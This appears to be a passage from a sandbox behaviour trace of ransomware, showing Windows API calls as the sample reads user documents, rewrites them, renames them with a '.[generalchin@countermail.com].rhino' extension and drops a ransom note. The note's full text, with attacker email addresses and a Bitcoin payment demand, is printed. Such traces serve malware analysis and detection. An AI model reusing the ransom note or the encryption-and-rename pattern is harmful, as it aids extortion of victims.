(HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b32b8 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b32b8 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b47f8 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b67c0 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b47f8 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b67c0 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b32b8 [0107.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2415b88 [0107.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.351] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0107.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2415b88 | out: hHeap=0x6d0000) returned 1 [0107.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24cf088 [0107.354] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0107.355] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x24e58c0 [0107.356] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24cf088 | out: hHeap=0x6d0000) returned 1 [0107.356] WriteFile (in: hFile=0x294, lpBuffer=0x24e58e0*, nNumberOfBytesToWrite=0x16c0b, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24e58e0*, lpNumberOfBytesWritten=0x292f304*=0x16c0b, lpOverlapped=0x0) returned 1 [0107.357] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24e58c0 | out: hHeap=0x6d0000) returned 1 [0107.357] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16c0b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.357] CloseHandle (hObject=0x294) returned 1 [0107.360] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9ee8 [0107.360] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7148e0 [0107.360] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9ee8 | out: hHeap=0x6d0000) returned 1 [0107.360] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\52FjfcR9Co.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\52fjfcr9co.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\52FjfcR9Co.xlsx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\52fjfcr9co.xlsx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x712898 [0107.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x712930 [0107.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7148e0 [0107.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712930 | out: hHeap=0x6d0000) returned 1 [0107.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.415] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0107.415] WriteFile (in: hFile=0x110, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0107.416] CloseHandle (hObject=0x110) returned 1 [0107.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\8tNv6sMqzXXl M.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\8tnv6smqzxxl m.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.417] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0xdbb0 [0107.417] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xdcd0, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.417] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.417] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.418] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.418] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0xdbb0, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0xdbb0, lpOverlapped=0x0) returned 1 [0107.419] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.419] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.419] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.419] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.419] GetLastError () returned 0x0 [0107.419] SetLastError (dwErrCode=0x0) [0107.419] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.419] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xdbd3) returned 0x23ff070 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7148e0 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.420] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f58 [0107.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x712930 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x712290 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712930 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x714e58 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x712290 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b32b8 [0107.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b32b8 [0107.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b47f8 [0107.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b67c0 [0107.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b47f8 | out: hHeap=0x6d0000) returned 1 [0107.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0107.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b67c0 | out: hHeap=0x6d0000) returned 1 [0107.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b32b8 [0107.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x240cc50 [0107.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0107.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x240cc50 | out: hHeap=0x6d0000) returned 1 [0107.427] WriteFile (in: hFile=0x110, lpBuffer=0x24c0060*, nNumberOfBytesToWrite=0xdcd0, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24c0060*, lpNumberOfBytesWritten=0x292f304*=0xdcd0, lpOverlapped=0x0) returned 1 [0107.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0107.427] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xdcd0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.427] CloseHandle (hObject=0x110) returned 1 [0107.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9ee8 [0107.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x712290 [0107.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9ee8 | out: hHeap=0x6d0000) returned 1 [0107.433] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\8tNv6sMqzXXl M.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\8tnv6smqzxxl m.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\8tNv6sMqzXXl M.ots.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\8tnv6smqzxxl m.ots.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.434] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.434] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.434] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.437] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x712930 [0107.437] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.437] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x712898 [0107.437] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7148e0 [0107.437] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.437] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\ljV0AFrtFxxFy9Liq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\ljv0afrtfxxfy9liq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.438] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x107b0 [0107.438] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x108d0, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.438] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.438] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.439] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.439] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x107b0, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x107b0, lpOverlapped=0x0) returned 1 [0107.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.440] GetLastError () returned 0x0 [0107.440] SetLastError (dwErrCode=0x0) [0107.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x107d3) returned 0x23ff070 [0107.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7148e0 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.443] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f58 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.444] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x712898 [0107.444] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x712290 [0107.448] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x108d0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.448] CloseHandle (hObject=0x110) returned 1 [0107.448] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.448] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x712290 [0107.451] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x394a, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.451] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.451] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.452] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.453] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x382a, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x382a, lpOverlapped=0x0) returned 1 [0107.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.453] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.453] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.454] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x394a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.454] CloseHandle (hObject=0x110) returned 1 [0107.454] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, 